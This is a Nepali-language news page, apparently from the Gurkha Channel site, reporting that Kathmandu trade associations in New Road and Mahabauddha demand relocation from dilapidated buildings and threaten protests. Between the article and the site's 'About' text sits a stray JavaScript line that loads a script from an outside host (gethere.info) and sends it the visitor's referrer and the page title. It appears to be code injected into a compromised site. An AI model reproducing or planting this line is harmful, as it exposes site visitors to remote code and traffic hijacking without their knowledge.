व्यबसायी

admin Avatar

काठमाडौंका न्यूरोड र महाबौद्धमा थोक ब्यवसाय गरि बस्ने विभिन्नि विषयगत ब्यवसायी संघहरुले आफूहरुलाई त्यहाँबाट सुरक्षित स्थानमा स्थानान्तरण गर्न माग गरेका छन। आईतवार रिपोर्टर्स क्लब नेपालमा संयूक्त पत्रकार सम्मेलन गर्दे उनीहरुले मुलुकको प्रमुख आर्थिक केन्द्रको रुपमा रहेको न्यूरोड र बौद्ध क्षेत्रका भवनहरु जिर्ण रहेकोले कुनै पनि बेला भयंकर दुर्घटना हुन सक्ने भन्दै आफूहरुलाई सुरक्षित स्थानमा स्थानान्तरण गर्न सरकारसँग माग गरे। पत्रकार सम्मेलनमा नेपाल जुत्ता चप्पल उद्योग ब्यवसायी संघका अध्यक्ष नरेश कटुवालले प्राकृतिक प्रकोपबाट हुने क्षति न्यूनिकरण गर्न, सुरक्षित क्षेत्र बनाउन, पार्किङ्ग, भण्डारण लगायतका समस्या सहजीकरण गर्न, ब्यापार ब्यवसायलाई आधुनिकिकरण गर्नकोलागि पनि स्थानान्तरण जरुरी रहेको बतााउनुभयो।

उहाले सरकारको मार्गनिर्देशनमात्र गरेर आफूहरु बैकल्पि स्थानमा भवन बनाएर ब्यापार गर्न तयार रहेको भन्दै माग पुरा नभए ब्यवसाय बन्द गरेर आन्दोलनमा उत्रने चेतावनी दिनुभयो। राष्ट्रिय ब्यापार संघ, नेपाल ब्याग उद्योग संघ, नेपाल गणतान्त्रिक ब्यापार संघ, नेपाल एकता ब्यापार संघ, नेपाल जुत्ता चप्पल उद्योग ब्यवसायी संघ, चाहना ब्यापार संघ, रञ्जना ब्यापार संघ, फुट बेयर एशोसिएसन अफ नेपाल र नेपाल ब्यापार संघले संयूक्त रुपमा पत्रकार सम्मेलन गरेर त्यस्तो माग गरेका हुन।

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

About Gurkha Channel

Gurkha channel is the sister company of Gurkha TV and the first 24-hour Nepali channel operating from the international capital of the world,London, United Kingdom. Gurkha Channels believes in honesty, respect, and unity. We belong to the land of Lord Buddha, Mt. Everest, and gallant people who sacrifice their lives for peace and humanity. Therefore, in this world of globalization, it is our effort to bring all Nepalese from around the world together and make one family: one Nation.

Search
Cateegories